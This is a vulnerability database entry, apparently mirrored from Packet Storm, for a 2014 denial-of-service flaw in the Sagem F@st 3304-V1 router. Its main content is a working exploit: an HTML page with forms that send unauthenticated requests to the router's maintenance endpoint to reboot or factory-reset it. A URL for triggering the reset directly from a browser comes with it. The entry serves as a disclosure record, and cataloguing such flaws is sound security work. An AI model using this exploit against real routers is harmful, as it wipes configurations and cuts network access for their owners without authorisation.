ID
VAR-E-201407-0115
TITLE
Sagem F@st 3304-V1 Denial Of Service
Trust: 0.5
DESCRIPTION
Sagem F@st 3304-V1 suffers from a denial of service vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | sagem | model: | f@st | scope: | eq | version: | 3304-v1 | Trust: 0.5 |
EXPLOIT
# Title : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage : http://www.sagemcom.com
# Tested on : Firefox, Google Chrome
# Tested Router : Sagem F@st 3304-V1
# Date : 2014-07-26
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:
<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
</FORM>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
</FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
CREDITS
Z3ro0ne
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 127641 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 127641 |
LAST UPDATE DATE
2022-07-27T09:18:47.623000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 127641 | date: | 2014-07-28T12:02:22 |